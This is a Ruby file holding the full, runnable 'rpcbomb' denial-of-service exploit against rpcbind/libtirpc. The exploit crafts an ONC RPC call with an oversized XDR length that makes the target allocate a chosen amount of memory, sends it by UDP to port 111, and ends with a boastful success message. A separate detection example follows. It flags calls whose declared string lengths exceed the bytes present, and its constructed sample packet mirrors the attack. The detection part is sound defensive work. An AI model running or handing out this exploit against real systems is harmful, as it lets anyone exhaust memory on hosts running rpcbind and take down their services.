#!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.

require 'socket'

def usage
  abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end

# Banner (the ASCII-art logo did not survive extraction; text portion kept)
bomb = """
r p c b o m b
DoS exploit for *nix rpcbind/libtirpc.
(c) 2017 Guido Vranken.
https://guidovranken.wordpress.com/
"""

puts bomb

if ARGV.length >= 2
  begin
    host = ARGV[0]
    numBytes = Integer(ARGV[1])
    port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
  rescue
    usage
  end

  # ONC RPC v2 CALL header, all fields big-endian 32-bit (XDR)
  pkt = [0].pack('N')         # xid
  pkt << [0].pack('N')        # message type CALL
  pkt << [2].pack('N')        # RPC version 2
  pkt << [100000].pack('N')   # Program (rpcbind/portmapper)
  pkt << [4].pack('N')        # Program version
  pkt << [9].pack('N')        # Procedure
  pkt << [0].pack('N')        # Credentials AUTH_NULL
  pkt << [0].pack('N')        # Credentials length 0
  pkt << [0].pack('N')        # Verifier AUTH_NULL
  pkt << [0].pack('N')        # Verifier length 0
  # Procedure arguments
  pkt << [0].pack('N')        # Program: 0
  pkt << [0].pack('N')        # Ver
  pkt << [4].pack('N')        # Proc
  pkt << [4].pack('N')        # Argument length
  pkt << [numBytes].pack('N') # Payload

  s = UDPSocket.new
  s.send(pkt, 0, host, port)
  sleep 1.5

  begin
    s.recvfrom_nonblock(9000)
  rescue
    puts "No response from server received."
    exit()
  end

  puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
       "\nDamn it feels good to be a gangster.\n\n"
else
  usage
end
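The datagram built above declares an XDR length with no bytes behind it. As an added detection example (not part of rpcbomb or of rpcbind's own code), the Ruby below parses an ONC RPC v2 CALL header the way rpcbind receives it, walks the rpcb argument (r_prog, r_vers, then the XDR strings r_netid, r_addr, r_owner) of the procedures that take one, and flags any string whose declared length exceeds what is actually present. The sample datagrams BENIGN and BOMB_LIKE are constructed inline; the procedure list RPCB_ARG_PROCS is this example's own assumption about which rpcbind v3/v4 procedures carry an rpcb argument.

```ruby
RPCBIND_PROG = 100000
# rpcbind v3/v4 procedures assumed here to take an rpcb struct argument
# (SET, UNSET, GETADDR, GETVERSADDR, GETADDRLIST).
RPCB_ARG_PROCS = [1, 2, 3, 9, 11].freeze

# Parse an ONC RPC v2 CALL header (xid, mtype, rpcvers, prog, vers, proc,
# credentials, verifier); returns a hash, or nil if malformed or truncated.
def parse_rpc_call(data)
  return nil if data.bytesize < 24
  xid, mtype, rpcvers, prog, vers, proc_num = data.unpack('N6')
  return nil unless mtype == 0 && rpcvers == 2
  off = 24
  2.times do                                   # cred, then verf
    return nil if data.bytesize < off + 8
    _flavor, len = data.byteslice(off, 8).unpack('N2')
    off += 8 + ((len + 3) & ~3)                # opaque body, 4-byte padded
    return nil if off > data.bytesize
  end
  { xid: xid, prog: prog, vers: vers, proc: proc_num, body: data.byteslice(off..-1) }
end

# First XDR string in an rpcb argument whose declared length is not backed by
# bytes actually in the datagram, or nil when every length is honest.
def oversized_xdr_string(body)
  off = 8                                      # skip r_prog, r_vers
  %w[r_netid r_addr r_owner].each do |name|
    return nil if body.bytesize < off + 4      # truncated: nothing declared
    len = body.byteslice(off, 4).unpack1('N')
    avail = body.bytesize - off - 4
    return { field: name, declared: len, available: avail } if len > avail
    off += 4 + ((len + 3) & ~3)
  end
  nil
end

def suspicious_rpcbind_call?(data)
  c = parse_rpc_call(data)
  return false unless c && c[:prog] == RPCBIND_PROG &&
                      [3, 4].include?(c[:vers]) && RPCB_ARG_PROCS.include?(c[:proc])
  !oversized_xdr_string(c[:body]).nil?
end

# Helpers used only to build the constructed samples below.
def xdr_string(s)
  [s.bytesize].pack('N') + s + "\0" * ((4 - s.bytesize % 4) % 4)
end

def build_call(prog, vers, proc_num, body)
  [0x1234, 0, 2, prog, vers, proc_num, 0, 0, 0, 0].pack('N10') + body
end

# Constructed: a normal GETVERSADDR lookup with every string fully present.
BENIGN = build_call(RPCBIND_PROG, 4, 9, [0, 0].pack('N2') +
         xdr_string('udp') + xdr_string('0.0.0.0.0.111') + xdr_string(''))
# Constructed: same call shape, but r_addr claims 256 MiB with zero bytes behind it.
BOMB_LIKE = build_call(RPCBIND_PROG, 4, 9, [0, 0, 4, 4, 0x10000000].pack('N5'))
```

Feeding captured port 111 datagrams through suspicious_rpcbind_call? gives a signature that keys on the length mismatch rather than on a fixed payload size.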